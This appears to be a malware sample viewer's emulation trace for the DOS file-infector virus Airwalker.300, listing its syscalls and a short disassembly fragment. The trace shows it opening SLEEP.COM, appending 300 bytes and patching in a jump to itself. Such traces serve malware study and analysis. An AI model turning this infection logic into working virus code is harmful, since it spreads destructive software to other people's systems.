Sample viewer

vx.netlux.org/Virus.DOS.Airwalker.300

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:27.071625834Z 26 PC: 12aa0 | Set disk transfer address
2018-12-17T22:24:27.074908187Z 78 PC: 12aac | Find first file
2018-12-17T22:24:27.080760306Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:27.087589446Z 63 PC: 12acd | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:27.094653687Z 66 PC: 12ae0 | Move file pointer
2018-12-17T22:24:27.096988798Z 44 PC: 12aed | Get time 0x12aed: xchg ch, cl
0x12aef: add dx, cx
0x12af1: mov word ptr [bp + 0x11c], dx
0x12af5: mov ah, 0x40
0x12af7: mov cx, 0x12c
0x12afa: mov dx, bp
0x12afc: pushaw
0x12afd: jmp 0x12ba4
0x12b00: pop ax
0x12b01: jb 0x12aae
0x12b03: sub ax, 3
0x12b06: push bx
0x12b07: mov bx, bp
0x12b09: mov word ptr cs:[bx + 1], ax
0x12b0d: mov byte ptr [bx], 0xe9
0x12b10: pop bx
0x12b11: mov ax, 0x4200
0x12b14: xor cx, cx
0x12b16: cdq
0x12b17: int 0x21
2018-12-17T22:24:27.099542685Z 64 PC: 12baa | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:24:27.115801025Z 66 PC: 12b19 | Move file pointer
2018-12-17T22:24:27.118149604Z 64 PC: 12b25 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:27.124609457Z 62 PC: 12b2b | Close file
2018-12-17T22:24:27.132628792Z 9 PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.300 virus! ')